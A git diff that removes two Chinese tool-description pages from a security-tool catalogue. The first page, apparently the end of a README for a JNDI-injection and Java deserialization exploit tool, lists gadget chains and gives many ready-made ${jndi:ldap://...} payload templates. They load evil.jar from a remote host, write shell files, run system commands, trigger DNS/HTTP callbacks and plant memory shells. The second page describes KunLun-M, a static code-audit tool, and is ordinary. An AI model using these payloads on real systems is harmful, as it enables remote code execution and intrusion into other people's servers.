-换成CS或者MSF生成的JAR包，即可完成一键上线。
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
-        (RC-http://xxxx.com/evil.jar#EvilClass)
-    }}})
-}}
-```
-
-WF ：Write File - 通过 FileOutputStream.write() 来写入文件，使用命令：WF-/tmp/shell#123
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
-        (WF-/tmp/shell#123)
-    }}})
-}}
-```
-
-其他：普通命令执行 - 通过 ProcessBuilder().start() 执行系统命令，使用命令 whoami
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/Clojure/nu1r/Base64/{{base64
-        (whoami)
-    }}})
-}}
-```
-
----
-
-# 🐗C3P04的使用
-
-* 远程加载 Jar 包
-    * C3P04 'remoteJar-http://1.1.1.1.com/1.jar'
-* 向服务器写入 Jar 包并加载（不出网）
-    * C3P04 'writeJar-/tmp/evil.jar:./yaml.jar'
-    * C3P04 'localJar-./yaml.jar'
-* C3P0 二次反序列化
-    * C3P04 'c3p0Double-/usr/CC6.ser'
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/C3P04/nu1r/Base64/{{base64
-        ([base64_encoded_cmd])
-    }}})
-}}
-```
-
----
-
-# 🐅SignedObject 二次反序列化 Gadget
-
-用来进行某些场景的绕过（常见如 TemplatesImpl 黑名单，CTF 中常出现的 CC 无数组加黑名单等）
-
-利用链需要调用 SignedObject 的 getObject 方法，因此需要可以调用任意方法、或调用指定类 getter 方法的触发点；
-
-大概包含如下几种可用的常见调用链：
-
-1. InvokerTransformer 调用任意方法（依赖 CC）
-2. BeanComparator 调用 getter 方法（依赖 CB）
-3. BasicPropertyAccessor$BasicGetter 调用 getter 方法(依赖 Hibernate)
-4. ToStringBean 调用全部 getter 方法（依赖 Rome）
-5. MethodInvokeTypeProvider 反射调用任意方法（依赖 spring-core）
-6. MemberBox 反射调用任意方法（依赖 rhino）
-
-* `cc`,`cc4`,`cb`,`hibernate`,`rome`,`rhino`,`spring`
-
-* 利用方式：
-* SignedObjectPayload -> 'CC:CommonsCollections6:b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==:1:10000' 最后两个参数是反序列化的类型
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/SignedObject/nu1r/Base64/{{base64
-        (CC:commonscollections6:{{base64
-            (open -a Calculator.app)
-        }}1::10000)
-    }}})
-}}
-```
-
-效果图：
-
-![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/markdown微信截图_20220820135253.png)
-
----
-
-# 🕷️Deserialization路由
-
-| Gadget                                      | 依赖                                                                                                                                                                                                                                                                         | ps            |
-|:--------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------|
-| AspectJWeaver                               | aspectjweaver:1.9.2<br/>commons-collections:3.2.2                                                                                                                                                                                                                          |               |
-| AspectJWeaver2                              | org.aspectj:aspectjweaver:1.9.2<br/>commons-collections:commons-collections:3.2.2                                                                                                                                                                                          |               |
-| BeanShell1                                  | org.beanshell:bsh:2.0b5                                                                                                                                                                                                                                                    |               |
-| C3P0                                        | com.mchange:c3p0:0.9.5.2<br/>mchange-commons-java:0.2.11                                                                                                                                                                                                                   |               |
-| C3P02                                       | com.mchange:c3p0:0.9.5.2<br/>com.mchange:mchange-commons-java:0.2.11<br/>org.apache:tomcat:8.5.35                                                                                                                                                                          |               |
-| C3P03                                       | com.mchange:c3p0:0.9.5.2<br/>com.mchange:mchange-commons-java:0.2.11<br/>org.apache:tomcat:8.5.35<br/>org.codehaus.groovy:groovy:2.3.9                                                                                                                                     |               |
-| C3P04                                       | com.mchange:c3p0:0.9.5.2<br/>com.mchange:mchange-commons-java:0.2.11<br/>org.apache:tomcat:8.5.35<br/>org.yaml:snakeyaml:1.30                                                                                                                                              |               |
-| C3P092                                      | com.mchange:c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8<br/>com.mchange:mchange-commons-java:0.2.11                                                                                                                                                                               |               |
-| Click1                                      | org.apache.click:click-nodeps:2.3.0<br/>javax.servlet:javax.servlet-api:3.1.0                                                                                                                                                                                              |               |
-| Clojure                                     | org.clojure:clojure:1.8.0                                                                                                                                                                                                                                                  |               |
-| CommonsBeanutils1                           | commons-beanutils:commons-beanutils:1.9.2<br/>commons-collections:commons-collections:3.1<br/>commons-logging:commons-logging:1.2                                                                                                                                          |               |
-| CommonsBeanutils1Jdbc                       |                                                                                                                                                                                                                                                                            | 高版本Bypass     |
-| CommonsBeanutils2                           | commons-beanutils:commons-beanutils:1.9.2                                                                                                                                                                                                                                  | 可打shiro       |
-| CommonsBeanutils2Jdbc                       |                                                                                                                                                                                                                                                                            | 高版本Bypass     |
-| CommonsBeanutils2NOCC                       | commons-beanutils:commons-beanutils:1.8.3<br/>commons-logging:commons-logging:1.2                                                                                                                                                                                          |               |
-| CommonsBeanutils1183NOCC                    | commons-beanutils:commons-beanutils:1.8.3                                                                                                                                                                                                                                  |               |
-| CommonsBeanutilsAttrCompare                 | commons-beanutils:commons-beanutils:1.9.2                                                                                                                                                                                                                                  |               |
-| CommonsBeanutilsAttrCompare183              | commons-beanutils:commons-beanutils:1.8.3                                                                                                                                                                                                                                  |               |
-| CommonsBeanutilsObjectToStringComparator    | "commons-beanutils:commons-beanutils:1.9.2 org.apache.commons:commons-lang3:3.10"                                                                                                                                                                                          |               |
-| CommonsBeanutilsObjectToStringComparator183 | "commons-beanutils:commons-beanutils:1.8.3"                                                                                                                                                                                                                                |               |
-| CommonsBeanutilsPropertySource              | "commons-beanutils:commons-beanutils:1.9.2 org.apache.logging.log4j:log4j-core:2.17.1"                                                                                                                                                                                     |               |
-| CommonsBeanutilsPropertySource183           | "commons-beanutils:commons-beanutils:1.9.2 org.apache.logging.log4j:log4j-core:2.17.1"                                                                                                                                                                                     |               |
-| CommonsCollections1                         | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                |               |
-| CommonsCollections2                         | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                |               |
-| CommonsCollections3                         | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                |               |
-| CommonsCollections4                         | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                |               |
-| CommonsCollections5                         | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                |               |
-| CommonsCollections6                         | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                |               |
-| CommonsCollections7                         | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                |               |
-| CommonsCollections8                         | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                |               |
-| CommonsCollections9                         | commons-collections:commons-collections:3.2.1                                                                                                                                                                                                                              |               |
-| CommonsCollections10                        | commons-collections:commons-collections:3.2.1                                                                                                                                                                                                                              |               |
-| CommonsCollections11                        | commons-collections:commons-collections:3.2.1                                                                                                                                                                                                                              |               |
-| CommonsCollections12                        | commons-collections:commons-collections:3.2.1                                                                                                                                                                                                                              |               |
-| CommonsCollectionsK1                        | commons-collections:commons-collections:3.2.1                                                                                                                                                                                                                              |               |
-| CommonsCollectionsK2                        | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                |               |
-| CommonsCollectionsK3                        | commons-collections:commons-collections:3.1                                                                                                                                                                                                                                | CC6简化的写法      |
-| CommonsCollectionsK4                        | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                | CC6简化的写法的4.0版 |
-| CommonsCollectionsK5                        | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                | CC7的4.0版      |
-| CommonsCollectionsK6                        | org.apache.commons:commons-collections4:4.0                                                                                                                                                                                                                                | CC11的4.0版     |
-| Fastjson1                                   | Fastjosn 1.2.48                                                                                                                                                                                                                                                            |               |
-| Fastjson2                                   | Fastjosn 2+                                                                                                                                                                                                                                                                |               |
-| Groovy1                                     | org.codehaus.groovy:groovy:2.3.9                                                                                                                                                                                                                                           |               |
-| Hibernate1                                  | org.hibernate:hibernate-core:5.0.7.Final<br/>org.hibernate:hibernate-core:4.3.11.Final                                                                                                                                                                                     |               |
-| Hibernate2                                  | org.hibernate:hibernate-core:5.0.7.Final<br/>org.hibernate:hibernate-core:4.3.11.Final                                                                                                                                                                                     |               |
-| Jackson                                     |                                                                                                                                                                                                                                                                            |               |
-| JavassistWeld1                              | javassist:javassist:3.12.1.GA<br/>org.jboss.weld:weld-core:1.1.33.Final<br/>javax.interceptor:javax.interceptor-api:3.1<br/>javax.enterprise:cdi-api:1.0-SP1<br/>org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final<br/>org.slf4j:slf4j-api:1.7.21                    |               |
-| JBossInterceptors1                          | javassist:javassist:3.12.1.GA<br/>org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final<br/>javax.enterprise:cdi-api:1.0-SP1<br/>javax.interceptor:javax.interceptor-api:3.1<br/>org.slf4j:slf4j-api:1.7.21<br/>org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final |               |
-| Jdk7u21                                     | -                                                                                                                                                                                                                                                                          |               |
-| Jdk7u21variant                              | -                                                                                                                                                                                                                                                                          |               |
-| JRE8u20                                     |                                                                                                                                                                                                                                                                            |               |
-| JRE8u20_2                                   |                                                                                                                                                                                                                                                                            |               |
-| JSON1                                       | net.sf.json-lib:json-lib:jar:jdk15:2.4<br/>org.springframework:spring-aop:4.1.4.RELEASE                                                                                                                                                                                    |               |
-| Jython1                                     | org.python:jython-standalone:2.5.2                                                                                                                                                                                                                                         |               |
-| MozillaRhino1                               | rhino:js:1.7R2                                                                                                                                                                                                                                                             |               |
-| MozillaRhino2                               | rhino:js:1.7R2                                                                                                                                                                                                                                                             |               |
-| Myfaces1                                    | -                                                                                                                                                                                                                                                                          |               |
-| Myfaces2                                    | -                                                                                                                                                                                                                                                                          |               |
-| RenderedImage                               | javax.media:jai-codec-1.1.3                                                                                                                                                                                                                                                |               |
-| ROME                                        | rome:rome:1.0                                                                                                                                                                                                                                                              |               |
-| ROME2                                       | rome:rome:1.0<br/>JDK 8+                                                                                                                                                                                                                                                   |               |
-| Spring1                                     | org.springframework:spring-core:4.1.4.RELEASE<br/>org.springframework:spring-beans:4.1.4.RELEASE                                                                                                                                                                           |               |
-| Spring2                                     | org.springframework:spring-core:4.1.4.RELEASE<br/>org.springframework:spring-aop:4.1.4.RELEASE<br/>aopalliance:aopalliance:1.0<br/>commons-logging:commons-logging:1.2                                                                                                     |               |
-| Spring3                                     | org.springframework:spring-tx:5.2.3.RELEASE<br/>org.springframework:spring-context:5.2.3.RELEASE<br/>javax.transaction:javax.transaction-api:1.2                                                                                                                           |               |
-| Vaadin1                                     | com.vaadin:vaadin-server:7.7.14<br/>com.vaadin:vaadin-shared:7.7.14                                                                                                                                                                                                        |               |
-| Wicket1                                     | org.apache.wicket:wicket-util:6.23.0<br/>org.slf4j:slf4j-api:1.6.4                                                                                                                                                                                                         |               |
-
-- a：恶意类是否继承 AbstractTranslet
-- o：使用反射绕过
-  ~~- j：使用 ObjectInputStream/ObjectOutputStream 来构造序列化流~~（这个构造的流有BUG，还在思考修复）
-- 需要参数时，在命令后面添加，#参数
-* 使用示例：
-
-```
-{{url
-  (${jndi:ldap://0.0.0.0:1389/Deserialization/[GadgetType]/nu1r/Base64/{{base64
-      (base64_encoded_cmd#-a -o)
-  }}})
-}}
- ```
-
----
-对于Gadget：
-
-- CommonsCollections1
-- CommonsCollections5
-- CommonsCollections6
-- CommonsCollectionsK3
-- CommonsCollectionsK4
-- CommonsCollections7
-- commonscollectionsK5
-- CommonsCollections9
-
-* 使用 `Transformer[]` 数组实现
-
-为其拓展了除了 Runtime 执行命令意外的多种利用方式，具体如下：
-
-TS ：Thread Sleep - 通过 Thread.sleep() 的方式来检查是否存在反序列化漏洞，使用命令：TS-10
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (TS-10)
-    }}})
-}}
-```
-
-RC ：Remote Call - 通过 URLClassLoader.loadClass()
-来调用远程恶意类并初始化，使用命令：RC-http://xxxx.com/evil.jar#EvilClass
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (RC-http://xxxx.com/evil.jar#EvilClass)
-    }}})
-}}
-```
-
-WF ：Write File - 通过 FileOutputStream.write() 来写入文件，使用命令：WF-/tmp/shell#d2hvYW1p
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (WF-/tmp/shell#d2hvYW1p)
-    }}})
-}}
-```
-
-PB ：ProcessBuilder 通过 ProcessBuilder.start() 来执行系统命令，使用命令 ```PB-lin-d2hvYW1p``` / ```PB-win-d2hvYW1p```
-分别在不同操作系统执行命令
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (PB-lin-b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==)
-    }}})
-}}
-```
-
-SE ：ScriptEngine - 通过 ScriptEngineManager.getEngineByName('js').eval() 来解析 JS 代码调用 Runtime 执行命令，使用命令
-SE-d2hvYW1
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (SE-d2hvYW1)
-    }}})
-}}
-```
-
-DL ：DNS LOG - 通过 InetAddress.getAllByName() 来触发 DNS 解析，使用命令 DL-xxxdnslog.cn
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (DL-xxxdnslog.cn)
-    }}})
-}}
-```
-
-HL ：HTTP LOG - 通过 URL.getContent() 来触发 HTTP LOG，使用命令 HL-http://xxx.com
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (HL-http://xxx.com)
-    }}})
-}}
-```
-
-BC ：BCEL Classloader - 通过 ..bcel...ClassLoader.loadClass().newInstance() 来加载 BCEL 类字节码，使用命令 BC-$BCEL$xxx
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (BC-$BCEL$xxx)
-    }}})
-}}
-```
-
-其他：普通命令执行 - 通过 Runtime.getRuntime().exec() 执行系统命令，使用命令 whoami
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/nu1r/Base64/{{base64
-        (whoami)
-    }}})
-}}
-```
-
-# 🐣其他利用链拓展
-
-对于除了以上的利用链,使用的是 `TemplatesImpl` 类来实现。
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections3/nu1r/Base64/{{base64
-        (whoami)
-    }}})
-}}
-```
-
-## 🐮任意自定义代码
-
-对于使用了 `TemplatesImpl` 类来实现的链子来说，可以使用此方法
-
-如果你不想使用本项目中提供的恶意逻辑，也不想执行命令，可以通过自定义代码的形式，自定义代码将会在目标服务器通过 `ClassLoader`
-进行加载并实例化。命令使用 `LF#` 开头，后面跟指定自定义类字节码文件的绝对路径。
-
-示例：
-
-**class 类文件绝对路径**
-
-```
-{{url
-  (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections3/nu1r/Base64/{{base64
-      (LF#/tmp/evil.class-org)
-  }}})
-}}
-```
-
-# 🦜利用链探测
-
-参考了 kezibei 师傅的 URLDNS 项目，实际情况可能有如下几种情况导致问题：
-
-+ 反序列时遇到黑名单，可能导致后面的类的 dnslog 出不来；
-+ 反序列化流程中由于种种情况报错可能导致出不来。
-
-因此这里还是提供了 all/common/指定类 三种探测方式：
-
-+ all：探测全部的类；
-+ common：探测不常在黑名单中的 CommonsBeanutils2/C3P0/AspectJWeaver/bsh/winlinux；
-+ 指定类：使用对应链中的关键字 CommonsCollections24:xxxx.dns.log 。
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/URLDNS/nu1r/Base64/{{base64
-        (all:xxxxxx.dns.log)
-    }}})
-}}
-```
-
-效果图：
-
-![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/markdownQQ截图20221107151444.png)
-
-| DNSLOG 关键字                               | 对应链                  | 关键类                                                       | 备注                                                         |
-| ------------------------------------------- | ----------------------- | ------------------------------------------------------------ | ------------------------------------------------------------ |
-| cc31or321<br />cc322                        | CommonsCollections13567 | org.apache.commons.collections.functors.ChainedTransformer<br />org.apache.commons.collections.ExtendedProperties$1 | CommonsCollections1/3/5/6/7<br />需要<=3.2.1版本             |
-| cc40<br />cc41                              | CommonsCollections24    | org.apache.commons.collections4.functors.ChainedTransformer<br />org.apache.commons.collections4.FluentIterable | CommonsCollections2/4链<br />需要4-4.0版本                   |
-| cb17<br />cb18x<br />cb19x                  | CommonsBeanutils2       | org.apache.commons.beanutils.MappedPropertyDescriptor\$1<br />org.apache.commons.beanutils.DynaBeanMapDecorator\$MapEntry<br />org.apache.commons.beanutils.BeanIntrospectionData | 1.7x-1.8x为-3490850999041592962<br />1.9x为-2044202215314119608 |
-| c3p092x<br />c3p095x                        | C3P0                    | com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase<br />com.mchange.v2.c3p0.test.AlwaysFailDataSource | 0.9.2pre2-0.9.5pre8为7387108436934414104<br />0.9.5pre9-0.9.5.5为7387108436934414104 |
-| ajw                                         | AspectJWeaver           | org.aspectj.weaver.tools.cache.SimpleCache                   | AspectJWeaver,需要cc31                                       |
-| bsh20b4<br />bsh20b5<br />bsh20b6           | bsh                     | bsh.CollectionManager\$1<br />bsh.engine.BshScriptEngine<br />bsh.collection.CollectionIterator\$1 | 2.0b4为4949939576606791809<br />2.0b5为4041428789013517368<br />2.0.b6无法反序列化 |
-| groovy1702311<br />groovy24x<br />groovy244 | Groovy                  | org.codehaus.groovy.reflection.ClassInfo\$ClassInfoSet<br />groovy.lang.Tuple2<br />org.codehaus.groovy.runtime.dgm\$1170 | 2.4.x为-8137949907733646644<br />2.3.x为1228988487386910280  |
-| becl                                        | Becl                    | com.sun.org.apache.bcel.internal.util.ClassLoader            | JDK<8u251                                                    |
-| Jdk7u21                                     | Jdk7u21                 | com.sun.corba.se.impl.orbutil.ORBClassLoader                 | JDK<=7u21                                                    |
-| JRE8u20                                     | JRE8u20                 | javax.swing.plaf.metal.MetalFileChooserUI\$DirectoryComboBoxModel\$1 | 7u25<=JDK<=8u20<br />这个检测不完美,8u25版本以及JDK<=7u21会误报<br />可综合Jdk7u21来看 |
-| linux<br />windows                          | winlinux                | sun.awt.X11.AwtGraphicsConfigData<br />sun.awt.windows.WButtonPeer | windows/linux版本判断                                        |
-|                                             | all                     |                                                              | 全部检测                                                     |
-
-# 🐳自定义
-
-+ 自定义链子
-
-在 `com.nu1r.jndi.gadgets` 下新建JAVA文件，并实现接口 ObjectPayload 后在 getObject 方法中编写链子逻辑即可。
-使用
-
-```
-{{url
-    (${jndi:ldap://0.0.0.0:1389/Deserialization/自定义链子的类名/nu1r/Base64/{{base64
-        (whoami)
-    }}})
-}}
-```
-
-+ 自定义内存马
-
-在 `com.nu1r.jndi.template` 下新建 JAVA 文件并将主要实现方法写在静态代码块中。
-
-额外方法与 shell 通过 javassist 引入 `com.nu1r.jndi.template.shell.MemShellPayloads`(最小化有效负载的大小)
-
-使用与上面内存马使用一致
-
----
-
-# 👮免责声明
-
-该工具仅用于安全自查检测
-
-由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。
-
-本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。
-
-# 🦚TODO
-
-GroovyBypass路由与WebsphereBypass路由的具体实现功能还在思考中
-
-# 🐲建议
-
-本项目用JDK1.8.0_332开发，不推荐用高于11的JDK，可能会出现错误
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v3.4.0] - 2023-08-11
-
-**新增**  
-- 新增绕过Nginx、CDN代理限制的WebSocket马  
-- 新增Tomcat、Spring、Jetty、Resin、Weblogic、Websphere的WebSocket马
-
-#### [v3.1.0] - 2023-07-06
-
-**更新**  
-- 路由不可控的情况下的利用  
-- jndi必须要使用账号密码认证
-
-#### [v2.5.0] - 2022-06-27
-
-**新增**  
-- 新增命令执行回显 weblogicEcho/WebsphereEcho/ResinEcho/WindowsEcho/LinuxEcho/JettyEcho
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/KunLun-M.md b/detail/KunLun-M.md
deleted file mode 100644
index e67e52546..000000000
--- a/detail/KunLun-M.md
+++ /dev/null
@@ -1,305 +0,0 @@
-## KunLun-M <https://github.com/LoRexxar/Kunlun-M>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.6.5-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-<big>**自Cobra-W 2.0版本起，Cobra-W正式更名为Kunlun-M(昆仑镜)，**</big>
-
-**请使用python3.6+运行该工具，已停止维护python2.7环境**
-
-# Kunlun-Mirror
-```
- _   __            _                      ___  ___
-| | / /           | |                     |  \/  |
-| |/ / _   _ _ __ | |    _   _ _ __       | .  . |
-|    \| | | | '_ \| |   | | | | '_ \ _____| |\/| |
-| |\  \ |_| | | | | |___| |_| | | | |_____| |  | |
-\_| \_/\__,_|_| |_\_____/\__,_|_| |_|     \_|  |_/  -v2.0
-
-GitHub: https://github.com/LoRexxar/Kunlun-M
-
-KunLun-M is a static code analysis system that automates the detecting vulnerabilities and security issue.
-
-Main Program
-
-positional arguments:
-  {init,config,scan,show,console}
-    init                Kunlun-M init before use.
-    config              config for rule&tamper
-    scan                scan target path
-    show                show rule&tamper
-    console             enter console mode
-
-optional arguments:
-  -h, --help            show this help message and exit
-
-Usage:
-  python kunlun.py scan -t tests/vulnerabilities
-  python kunlun.py scan -t tests/vulnerabilities -r 1000, 1001
-  python kunlun.py scan -t tests/vulnerabilities -tp wordpress
-  python kunlun.py scan -t tests/vulnerabilities -d -uc
-
-  python kunlun.py list rule -k php
-```
-
-## Introduction
-Cobra是一款**源代码安全审计**工具，支持检测多种开发语言源代码中的**大部分显著**的安全问题和漏洞。
-[https://github.com/wufeifei/cobra](https://github.com/wufeifei/cobra)
-
-Cobra-W是从Cobra2.0发展而来的分支，将工具重心从尽可能的发现威胁转变为提高发现漏洞的准确率以及精度。
-[https://github.com/LoRexxar/Kunlun-M/tree/cobra-w](https://github.com/LoRexxar/Kunlun-M/tree/cobra-w)
-
-Kunlun-Mirror是从Cobra-W2.0发展而来，在经历了痛苦的维护改进原工具之后，昆仑镜将工具的发展重心放在安全研究员的使用上，将会围绕工具化使用不断改进使用体验。
-
-目前工具主要支持**php、javascript**的语义分析，以及**chrome ext, solidity**的基础扫描.
-
-## Stargazers 
-
-<div align=center><a href="https://github.com/LoRexxar/Kunlun-M"><img src="https://api.star-history.com/svg?repos=LoRexxar/Kunlun-M&type=Timeline"></a></div>
-
-## why KunLun-M
-
-KunLun-M可能是市面上唯一的开源并长期维护的自动化代码审计工具，希望开源工具可以推动白盒审计的发展:>.
-
-## 特点
-
-与其他代码审计相比：
-- 静态分析，环境依赖小。
-- 语义分析，对漏洞有效性判断程度更深。
-- 多种语言支持。
-- 开源python实现，更易于二次开发。
-
-与Cobra相比：
-- 深度重写AST，大幅度减少漏洞误报率。
-- 底层api重写，支持windows、linux等多平台。
-- 多层语义解析、函数回溯，secret机制，新增多种机制应用于语义分析。
-- 新增javascript语义分析，用于扫描包含js相关代码。
-
-与Cobra-W相比(todo):
-- 深度优化AST分析流程，使其更符合QL的概念，便于下一阶段的优化。
-- 深度优化辅助审计的流程，使其更符合人类安全研究员审计辅助的习惯。
-- 深度重构代码结构，使其更符合可拓展，可优化的开源理念。
-
-## TODO
-**KunLun-M后续的更新计划会是跨越式更新，根据一段时间的研究和探索，我决定从底层重构这套代码分析方案**
-
-## 社区化工具
-
-社区成员完成的拓展（不保证安全性，参考使用）
-
-- [Kunlun-M-GUI](https://github.com/mark0smith/Kunlun-M-GUI)
-- [docker-kunlun-mirror](https://github.com/lazychanger/docker-kunlun-mirror)
-
-## 更新日志
-
-[changelog.md](https://github.com/LoRexxar/Kunlun-M/blob/master/docs/changelog.md)
-
-
-## 安装
-
-首先需要安装依赖
-```
-pip install -r requirements.txt
-```
-
-配置文件迁移
-```
-cp Kunlun_M/settings.py.bak Kunlun_M/settings.py
-```
-
-
-初始化数据库，默认采用sqlite作为数据库
-```
-python kunlun.py init initialize
-```
-
-加载规则进数据库（每次修改规则文件都需要加载）
-```
-python kunlun.py config load
-```
-
-### docker安装
-
-通过docker安装，默认启动web模式
-
-```
-sudo docker build -t kunlun-m -f ./docker/Dockerfile .
-```
-
-配合链接同Mysql可以实现本地扫描，web端查看结果。
-
-## Usage
-
-### cli mode
-
-使用scan模式扫描各类源代码
-```
-python3 kunlun.py scan -t ./tests/vulnerabilities/
-```
-
-使用config模式加载本地的rule/tamper
-```
-python3 kunlun.py config load         # 加载rule进数据库
-python3 kunlun.py config recover      # 将数据库中的rule恢复到文件
-python3 kunlun.py config loadtamper   # 加载tamper进数据库
-python3 kunlun.py config retamper     # 将数据库中的tamper恢复到文件
-
-```
-
-使用show模式查看目前的所有rule/tamper
-```
-python3 kunlun.py show rule           # 展示所有的rule
-python3 kunlun.py show rule -k php    # 展示所有php的rule
-python3 kunlun.py show tamper         # 展示所有的tamper
-```
-
-使用不同子模式的-h可以查看详细的帮助文档。
-
-
-### web mode
-KunLun-M Dashbroad，并且允许通过apitoken来访问api获取数据
-
-默认9999端口
-```
-python3 .\kunlun.py web -p 9999
-```
-
-![](https://github.com/LoRexxar/Kunlun-M/raw/master/docs/web.png)
-
-修改`KunLun-M/settings.py`中的api-token，通过?token={api_token}访问api获取数据
-```
-# api profile
-API_TOKEN = "secret_api_token"
-```
-
-Api List
-```
-task/list                                       查看task列表
-task/<int:task_id>                              查看task详细信息
-task/<int:task_id>/result                       查看task扫描结果
-task/<int:task_id>/resultflow                   查看task扫描结果流
-task/<int:task_id>/newevilfunc                  查看task扫描后生成的新恶意函数
-
-rule/list                                       查看规则列表
-rule/<int:rule_id>                              查看规则细节
-```
-
-### console mode
-
-**建议使用console模式**
-```
-python3 kunlun.py console
-
-
- _   __            _                      ___  ___
-| | / /           | |                     |  \/  |
-| |/ / _   _ _ __ | |    _   _ _ __       | .  . |
-|    \| | | | '_ \| |   | | | | '_ \ _____| |\/| |
-| |\  \ |_| | | | | |___| |_| | | | |_____| |  | |
-\_| \_/\__,_|_| |_\_____/\__,_|_| |_|     \_|  |_/  -v2.0
-
-GitHub: https://github.com/LoRexxar/Kunlun-M
-
-KunLun-M is a static code analysis system that automates the detecting vulnerabilities and security issue.
-
-Global commands:
-    help                                             Print this help menu
-    scan                                             Enter the scan mode
-    load <scan_id>                                   Load Scan task
-    showt                                            Show all Scan task list
-    show [rule, tamper] <key>                        Show rules or tampers
-    config [rule, tamper] <rule_id> | <tamper_name>  Config mode for rule & tamper
-    exit                                             Exit KunLun-M & save Config
-
-
-KunLun-M (root) >
-```
-
-#### 使用KunLun-M 查看 rules 和 tampers
-
-[![asciicast](https://asciinema.org/a/360842.svg)](https://asciinema.org/a/360842)
-
-#### 使用KunLun-M 扫描漏洞
-
-[![asciicast](https://asciinema.org/a/360843.svg)](https://asciinema.org/a/360843)
-
-#### 使用KunLun-M 查看扫描结果
-
-[![asciicast](https://asciinema.org/a/360845.svg)](https://asciinema.org/a/360845)
-
-
-### plugin mode
-
-#### phpunserializechain
-
-一个自动化寻找php反序列化链的简单模型
-
-**如果是旧版本更新并使用该插件扫描同一目标，请使用-r参数renew数据库**
-
-```
-python3 .\kunlun.py plugin php_unserialize_chain_tools -t {target_path}
-```
-
-![](https://github.com/LoRexxar/Kunlun-M/raw/master/docs/phpunserchain.png)
-
-
-#### EntranceFinder
-
-一个有趣的小工具，用于解决在审计大量的php代码时，快速发现存在可能的入口页面（或是开发者都遗漏的）。
-
-```
-python3 .\kunlun.py plugin entrance_finder -t {target_path} -l 3
-```
-
-![](https://github.com/LoRexxar/Kunlun-M/raw/master/docs/entrancefinder.png)
-
-## 开发文档
-
-开发文档还未更新.相应的文档内容仅供参考。
-
-[dev.md](https://github.com/LoRexxar/Kunlun-M/raw/master/docs/dev.md)
-
-### 规则插件开发
-
-规则插件开发遵循
-```
-rules/{语言类型}/CVI_xxxx.py
-```
-
-在规则目录下，只有命名符合规定的规则会被成功加载，命名格式严格为`CVI_编号.py`
-
-规则模板可以参考rules/rule.template
-
-### .kunlunmignore
-
-.kunlunmignore是新引入的用于黑名单扫描目录的功能。目前只支持*语法，可以用来匹配相应的目录以及文件类型。
-
-相匹配到的文件不会被扫描。
-
-当然，可以通过-b来实现
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2022-08-23 发布演示视频[404星链计划开源安全工具演示——KunLun-M](https://www.bilibili.com/video/BV15a411G7CT)
-
-## 最近更新
-
-#### [v2.6.5] - 2022-06-23
-
-**更新**  
